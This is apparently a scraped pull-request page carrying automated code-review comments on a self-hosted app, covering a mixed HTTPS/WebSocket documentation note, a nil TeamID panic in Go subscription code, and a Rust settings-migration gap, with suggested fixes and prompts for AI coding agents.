USE_TLS=truefor the backend (serving HTTPS on port 1926) but usesws://localhost:7880(non-TLS) for LiveKit. This creates a mixed security setup where an HTTPS page would connect to a WS endpoint.While localhost is often exempt from mixed-content blocking in modern browsers, this could cause WebRTC connection issues in some scenarios. Consider documenting this as a potential gotcha or verifying that this configuration works reliably.
📝 Suggested documentation addition
Add a note after line 127:
> **Note:** This setup uses HTTPS for the backend but WS (non-TLS) for LiveKit. Localhost is typically exempt from mixed-content restrictions, but if you encounter WebRTC connection issues, try using `USE_TLS=false` for the backend or configure TLS for LiveKit as well.🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@docs/src/content/docs/open-source/self-hosting.md` around lines 118 - 127, Add a short note clarifying the mixed TLS setup: explain that USE_TLS=true enables HTTPS for the backend (port 1926) while LIVEKIT_SERVER_URL is set to ws://localhost:7880 (non-TLS), which can create mixed-content or WebRTC issues; suggest either setting USE_TLS=false for local testing or configuring TLS for LiveKit (referencing livekit.dev.yaml) as troubleshooting steps and place this note immediately after the `.env` example.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Nitpick comments:
In `@docs/src/content/docs/open-source/self-hosting.md`:
- Around line 118-127: Add a short note clarifying the mixed TLS setup: explain
that USE_TLS=true enables HTTPS for the backend (port 1926) while
LIVEKIT_SERVER_URL is set to ws://localhost:7880 (non-TLS), which can create
mixed-content or WebRTC issues; suggest either setting USE_TLS=false for local
testing or configuring TLS for LiveKit (referencing livekit.dev.yaml) as
troubleshooting steps and place this note immediately after the `.env` example.
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: 83a7532a-46e9-44b5-a156-5de43d501148
📒 Files selected for processing (3)
docs/src/content/docs/features/settings.mdxdocs/src/content/docs/open-source/self-hosting.mdselfhost/compose.yml
✅ Files skipped from review due to trivial changes (1)
- docs/src/content/docs/features/settings.mdx
🚧 Files skipped from review as they are similar to previous changes (1)
- selfhost/compose.yml
There was a problem hiding this comment.
♻️ Duplicate comments (2)
backend/internal/models/user.go (1)
277-282:⚠️ Potential issue | 🟠 Major | ⚡ Quick winNil
user.TeamIDstill panics on the Stripe-enabled path.Previously flagged in an earlier review and not yet addressed in this revision: when
stripeEnabled == true, control falls through to line 282 where*user.TeamIDis dereferenced unconditionally (and again at line 291).AuthHandler.Userinhandlers.gocallsGetUserWithSubscriptiondirectly without the nil pre-check thatcheckUserHasAccessperforms inutils.go, so aManualSignUpaccount withTeamID == nilwill panic here on cloud deployments.🛡️ Proposed fix — guard nil TeamID immediately after the stripeEnabled bypass
func GetUserWithSubscription(db *gorm.DB, user *User, stripeEnabled bool) (*UserWithSubscription, error) { if !stripeEnabled { return &UserWithSubscription{User: *user, IsPro: true}, nil } + + if user.TeamID == nil { + return &UserWithSubscription{User: *user, IsPro: false}, nil + } team, err := GetTeamByID(db, strconv.Itoa(int(*user.TeamID)))🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@backend/internal/models/user.go` around lines 277 - 282, GetUserWithSubscription currently dereferences user.TeamID when stripeEnabled is true which panics for ManualSignUp users; add an immediate nil check after the stripeEnabled bypass in GetUserWithSubscription (e.g., if user.TeamID == nil) and handle it instead of dereferencing — return a safe UserWithSubscription (or an error) without accessing *user.TeamID so callers like AuthHandler.User won't crash; reference the GetUserWithSubscription function and the user.TeamID field when making the change and mirror any access-check behavior expected by checkUserHasAccess.tauri/src-tauri/src/app_state.rs (1)
12-12:⚠️ Potential issue | 🟠 Major | ⚡ Quick winMigration gap for existing
hopp_server_urltop-level values is still unresolved.Users who previously persisted a custom backend URL in an older
app_state.json(wherehopp_server_urllived at theAppStateInternaltop level) will silently lose that value on upgrade.serde_json::from_str::<AppStateInternal>ignores unknown fields by default, so the old top-level key is dropped with no migration path intouser_settings.hopp_server_url.The
AppState::new()migration block (around line 210) needs to temporarily accept the old field and promote it intoUserSettingsfor one release cycle — similar to how theOldAppStateInternalfallback already handles the JWT migration. A minimal approach:🔧 Suggested migration sketch
// Temporary migration struct — drop after one release +#[derive(Debug, Deserialize)] +struct AppStateInternalV1 { + #[serde(flatten)] + inner: AppStateInternal, + hopp_server_url: Option<String>, +}Then in
AppState::new(), deserialize intoAppStateInternalV1first, and ifinner.user_settings.hopp_server_urlisNoneandhopp_server_urlisSome, populate it before constructingAppState.🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the rest with a brief reason, keep changes minimal, and validate. In `@tauri/src-tauri/src/app_state.rs` at line 12, Add a short-lived migration path to preserve top-level hopp_server_url: introduce an intermediary struct (e.g., AppStateInternalV1) mirroring AppStateInternal but with a pub hopp_server_url: Option<String> field, then in AppState::new() first deserialize into AppStateInternalV1, and if inner.user_settings.hopp_server_url is None and hopp_server_url is Some, copy/promote that value into inner.user_settings.hopp_server_url before constructing the final AppState; keep this code temporary and remove the AppStateInternalV1/hopp_server_url handling in the next release.
🤖 Prompt for all review comments with AI agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.
Duplicate comments:
In `@backend/internal/models/user.go`:
- Around line 277-282: GetUserWithSubscription currently dereferences
user.TeamID when stripeEnabled is true which panics for ManualSignUp users; add
an immediate nil check after the stripeEnabled bypass in GetUserWithSubscription
(e.g., if user.TeamID == nil) and handle it instead of dereferencing — return a
safe UserWithSubscription (or an error) without accessing *user.TeamID so
callers like AuthHandler.User won't crash; reference the GetUserWithSubscription
function and the user.TeamID field when making the change and mirror any
access-check behavior expected by checkUserHasAccess.
In `@tauri/src-tauri/src/app_state.rs`:
- Line 12: Add a short-lived migration path to preserve top-level
hopp_server_url: introduce an intermediary struct (e.g., AppStateInternalV1)
mirroring AppStateInternal but with a pub hopp_server_url: Option<String> field,
then in AppState::new() first deserialize into AppStateInternalV1, and if
inner.user_settings.hopp_server_url is None and hopp_server_url is Some,
copy/promote that value into inner.user_settings.hopp_server_url before
constructing the final AppState; keep this code temporary and remove the
AppStateInternalV1/hopp_server_url handling in the next release.
ℹ️ Review info
⚙️ Run configuration
Configuration used: defaults
Review profile: CHILL
Plan: Pro
Run ID: b1bbd1e6-439b-4ac6-ad84-cb452fc7b1ab
📒 Files selected for processing (2)
backend/internal/models/user.gotauri/src-tauri/src/app_state.rs
** With settings entry.
** With self-hosting instructions.
What doesn't handle:
Summary by CodeRabbit
New Features
Documentation
Chores
Behavior